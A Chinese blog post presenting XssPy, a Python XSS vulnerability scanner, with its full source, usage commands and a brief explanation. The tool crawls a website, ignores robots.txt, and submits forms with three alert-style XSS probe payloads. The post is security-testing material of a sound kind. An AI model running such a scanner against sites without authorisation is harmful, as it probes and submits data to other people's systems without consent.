Web应用程序扫描XssPy

一个有力的事实是,微软、斯坦福、摩托罗拉、Informatica等很多大型企业机构都在用这款基于python的XSS(跨站脚本)漏洞扫描器。它的编写者Faizan Ahmad才华出众,XssPy是一个非常智能的工具,不仅能检查主页或给定页面,还能够检查网站上的所有链接以及子域。因此,XssPy的扫描非常细致且范围广泛。

 使用

反正我看了介绍那么好,就去下来看了
git://www.github.com/faizann24/XssPy.git

Git Clone代码到本地:
git clone http://www.github.com/faizann24/XssPy

kali已有
工具在 python 2.7上工作,你应该安装 mechanize。 如果未安装 mechanize,请在终端中键入”pip install mechanize”

用法:
python XssPy.py -u website.com -e

Python代码

  1. #!/usr/bin/env python
  2. import mechanize
  3. import sys
  4. import httplib
  5. import argparse
  6. import logging
  7. from urlparse import urlparse
  8.  
  9. br = mechanize.Browser() # initiating the browser
  10. br.addheaders = [
  11. ('User-agent',
  12. 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')
  13. ]
  14. br.set_handle_robots(False)
  15. br.set_handle_refresh(False)
  16.  
  17. payloads = ['<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)']
  18. blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg',
  19. '.pdf']
  20. xssLinks = [] # TOTAL CROSS SITE SCRIPTING FINDINGS
  21.  
  22.  
  23. class color:
  24. BLUE = '\033[94m'
  25. RED = '\033[91m'
  26. GREEN = '\033[92m'
  27. YELLOW = '\033[93m'
  28. BOLD = '\033[1m'
  29. END = '\033[0m'
  30.  
  31. @staticmethod
  32. def log(lvl, col, msg):
  33. logger.log(lvl, col + msg + color.END)
  34.  
  35.  
  36. print color.BOLD + color.RED + """
  37. XssPy - Finding XSS made easier
  38. Author: Faizan Ahmad (Fsecurify)
  39. Usage: XssPy.py website.com (Not www.website.com OR http://www.website.com)
  40. Comprehensive Scan: python XssPy.py -u website.com -e
  41. Verbose logging: python XssPy.py -u website.com -v
  42. Cookies: python XssPy.py -u website.complex -c name=val name=val
  43.  
  44. Description: XssPy is a python tool for finding Cross Site Scripting
  45. vulnerabilities in websites. This tool is the first of its kind.
  46. Instead of just checking one page as most of the tools do, this tool
  47. traverses the website and find all the links and subdomains first.
  48. After that, it starts scanning each and every input on each and every
  49. page that it found while its traversal. It uses small yet effective
  50. payloads to search for XSS vulnerabilities. XSS in many high
  51. profile websites and educational institutes has been found
  52. by using this very tool.
  53. """ + color.END
  54.  
  55. logger = logging.getLogger(__name__)
  56. lh = logging.StreamHandler() # Handler for the logger
  57. logger.addHandler(lh)
  58. formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S')
  59. lh.setFormatter(formatter)
  60.  
  61. parser = argparse.ArgumentParser()
  62. parser.add_argument('-u', action='store', dest='url',
  63. help='The URL to analyze')
  64. parser.add_argument('-e', action='store_true', dest='compOn',
  65. help='Enable comprehensive scan')
  66. parser.add_argument('-v', action='store_true', dest='verbose',
  67. help='Enable verbose logging')
  68. parser.add_argument('-c', action='store', dest='cookies',
  69. help='Space separated list of cookies',
  70. nargs='+', default=[])
  71. results = parser.parse_args()
  72.  
  73. logger.setLevel(logging.DEBUG if results.verbose else logging.INFO)
  74.  
  75.  
  76. def testPayload(payload, p, link):
  77. br.form[str(p.name)] = payload
  78. br.submit()
  79. # if payload is found in response, we have XSS
  80. if payload in br.response().read():
  81. color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!')
  82. report = 'Link: %s, Payload: %s, Element: %s' % (str(link),
  83. payload, str(p.name))
  84. color.log(logging.INFO, color.BOLD + color.GREEN, report)
  85. xssLinks.append(report)
  86. br.back()
  87.  
  88.  
  89. def initializeAndFind():
  90.  
  91. if not results.url: # if the url has been passed or not
  92. color.log(logging.INFO, color.GREEN, 'Url not provided correctly')
  93. return []
  94.  
  95. firstDomains = [] # list of domains
  96. allURLS = []
  97. allURLS.append(results.url) # just one url at the moment
  98. largeNumberOfUrls = [] # in case one wants to do comprehensive search
  99.  
  100. # doing a short traversal if no command line argument is being passed
  101. color.log(logging.INFO, color.GREEN, 'Doing a short traversal.')
  102. for url in allURLS:
  103. smallurl = str(url)
  104. # Test HTTPS/HTTP compatibility. Prefers HTTPS but defaults to
  105. # HTTP if any errors are encountered
  106. try:
  107. test = httplib.HTTPSConnection(smallurl)
  108. test.request("GET", "/")
  109. response = test.getresponse()
  110. if (response.status == 200) | (response.status == 302):
  111. url = "https://www." + str(url)
  112. elif response.status == 301:
  113. loc = response.getheader('Location')
  114. url = loc.scheme + '://' + loc.netloc
  115. else:
  116. url = "http://www." + str(url)
  117. except:
  118. url = "http://www." + str(url)
  119. try:
  120. br.open(url)
  121. for cookie in results.cookies:
  122. color.log(logging.INFO, color.BLUE,
  123. 'Adding cookie: %s' % cookie)
  124. br.set_cookie(cookie)
  125. br.open(url)
  126. color.log(logging.INFO, color.GREEN,
  127. 'Finding all the links of the website ' + str(url))
  128. for link in br.links(): # finding the links of the website
  129. if smallurl in str(link.absolute_url):
  130. firstDomains.append(str(link.absolute_url))
  131. firstDomains = list(set(firstDomains))
  132. except:
  133. pass
  134. color.log(logging.INFO, color.GREEN,
  135. 'Number of links to test are: ' + str(len(firstDomains)))
  136. if results.compOn:
  137. color.log(logging.INFO, color.GREEN,
  138. 'Doing a comprehensive traversal. This may take a while')
  139. for link in firstDomains:
  140. try:
  141. br.open(link)
  142. # going deeper into each link and finding its links
  143. for newlink in br.links():
  144. if smallurl in str(newlink.absolute_url):
  145. largeNumberOfUrls.append(newlink.absolute_url)
  146. except:
  147. pass
  148. firstDomains = list(set(firstDomains + largeNumberOfUrls))
  149. color.log(logging.INFO, color.GREEN,
  150. 'Total Number of links to test have become: ' +
  151. str(len(firstDomains))) # all links have been found
  152. return firstDomains
  153.  
  154.  
  155. def findxss(firstDomains):
  156. # starting finding XSS
  157. color.log(logging.INFO, color.GREEN, 'Started finding XSS')
  158. if firstDomains: # if there is atleast one link
  159. for link in firstDomains:
  160. blacklisted = False
  161. y = str(link)
  162. color.log(logging.DEBUG, color.YELLOW, str(link))
  163. for ext in blacklist:
  164. if ext in y:
  165. color.log(logging.DEBUG, color.RED,
  166. '\tNot a good url to test')
  167. blacklisted = True
  168. break
  169. if not blacklisted:
  170. try:
  171. br.open(str(link)) # open the link
  172. if br.forms(): # if a form exists, submit it
  173. params = list(br.forms())[0] # our form
  174. br.select_form(nr=0) # submit the first form
  175. for p in params.controls:
  176. par = str(p)
  177. # submit only those forms which require text
  178. if 'TextControl' in par:
  179. color.log(logging.DEBUG, color.YELLOW,
  180. '\tParam: ' + str(p.name))
  181. for item in payloads:
  182. testPayload(item, p, link)
  183. except:
  184. pass
  185. color.log(logging.DEBUG, color.GREEN + color.BOLD,
  186. 'The following links are vulnerable: ')
  187. for link in xssLinks: # print all xss findings
  188. color.log(logging.DEBUG, color.GREEN, '\t' + link)
  189. else:
  190. color.log(logging.INFO, color.RED + color.BOLD,
  191. '\tNo link found, exiting')
  192.  
  193.  
  194. # calling the function
  195. firstDomains = initializeAndFind()
  196. findxss(firstDomains)

原理

看过代码之后我们就知道软件的实现原理

1,根据提出的URL 设置为http[s]://www+URL

2,根据爬取得页面查找是否有表单。如果有表单

使用提供得3个载荷分别测试 = [‘<svg “ons>’, ‘” onfocus=”alert(1);’, ‘javascript:alert(1)’]

发表评论

邮箱地址不会被公开。 必填项已用*标注